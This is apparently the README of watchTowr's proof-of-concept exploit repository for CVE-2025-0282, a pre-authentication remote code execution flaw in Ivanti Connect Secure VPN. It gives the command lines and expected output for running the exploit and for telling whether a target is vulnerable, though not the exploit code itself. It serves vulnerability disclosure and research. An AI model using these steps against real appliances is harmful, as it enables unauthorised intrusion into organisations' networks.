Ivanti Connect Secure IFT TLS Stack Overflow pre-auth RCE (CVE-2025-0282)
watchtowrlabs/CVE-2025-0282
CVE-2025-0282

This PoC is purposefully broken in non-trivial ways and will require effort to make it work, as outlined previously in our exploitation technique blogpost.

To understand this vulnerability, you can take a look at our technical write-up.

Exploitation Walkthrough and Techniques - Ivanti Connect Secure RCE (CVE-2025-0282)

The PoC

The code operates in two modes:

  1. Normal Mode
  2. Exploit Mode

Start by running the code in "Normal" mode. If you are presented with a password prompt, the target is functional. Next, switch to "Exploit" mode. If you see the message "Failed to complete authentication", the target might be vulnerable. Note that the exploit code includes hardcoded addresses and offsets, which you will need to modify to match your approved target.

Normal mode expected result:

MODE=normal ./openconnect-9.12/openconnect --protocol=pulse --user=test 10.20.5.4  
                 __         .__  ___________                    
__  _  _______ _/  |_  ____ |  |_\__    ___/_____  _  _________ 
\ \/ \/ /\__  \\   __\/ ___\|  |  \|    | /  _ \ \/ \/ /\_  __ \
 \     /  / __ \|  | \  \___|   Y  \    |(  <_> )     /  |  | \/
  \/\_/  (____  /__|  \___  >___|  /____| \____/ \/\_/   |__|   
              \/          \/     \/                              


        (*) Ivanti Connect Secure IFT TLS Stack Overflow pre-auth RCE (CVE-2025-0282)

          - Sina Kheirkhah (@SinSinology) of watchTowr ([email protected])

        CVEs: [CVE-2025-0282]

Connected to 10.20.5.4:443
SSL negotiation with 10.20.5.4
Server certificate verify failed: signer not found

Certificate from VPN server "10.20.5.4" failed verification.
Reason: signer not found
To trust this server in future, perhaps add this to your command line:
    --servercert pin-sha256:kE2T2Rx2hc9EquYWABzj22wil29SZezWLdJ7OnhpdMw=
Enter 'yes' to accept, 'no' to abort; anything else to view: yes
Connected to HTTPS on 10.20.5.4 with ciphersuite (TLS1.2)-(RSA)-(AES-256-GCM)
Got HTTP response: HTTP/1.1 101 Switching Protocols
Enter user credentials:
Password:

Exploit mode expected result:

MODE=exploit ./openconnect-9.12/openconnect --protocol=pulse --user=test 10.20.5.4  
                 __         .__  ___________                    
__  _  _______ _/  |_  ____ |  |_\__    ___/_____  _  _________ 
\ \/ \/ /\__  \\   __\/ ___\|  |  \|    | /  _ \ \/ \/ /\_  __ \
 \     /  / __ \|  | \  \___|   Y  \    |(  <_> )     /  |  | \/
  \/\_/  (____  /__|  \___  >___|  /____| \____/ \/\_/   |__|   
              \/          \/     \/                              


        (*) Ivanti Connect Secure IFT TLS Stack Overflow pre-auth RCE (CVE-2025-0282)

          - Sina Kheirkhah (@SinSinology) of watchTowr ([email protected])

        CVEs: [CVE-2025-0282]

Connected to 10.20.5.4:443
SSL negotiation with 10.20.5.4
Server certificate verify failed: signer not found

Certificate from VPN server "10.20.5.4" failed verification.
Reason: signer not found
To trust this server in future, perhaps add this to your command line:
    --servercert pin-sha256:kE2T2Rx2hc9EquYWABzj22wil29SZezWLdJ7OnhpdMw=
Enter 'yes' to accept, 'no' to abort; anything else to view: yes
Connected to HTTPS on 10.20.5.4 with ciphersuite (TLS1.2)-(RSA)-(AES-256-GCM)
Got HTTP response: HTTP/1.1 101 Switching Protocols
Failed to read from TLS/DTLS socket: Error in the pull function.
Failed to complete authentication

 [!] Target might be vulnerable

Exploit authors

This exploit was written by Sina Kheirkhah (@SinSinology) of watchTowr (@watchtowrcyber)

Reference

The openconnect project, on which this code is built.

Follow watchTowr Labs

For the latest security research, follow the watchTowr Labs Team.
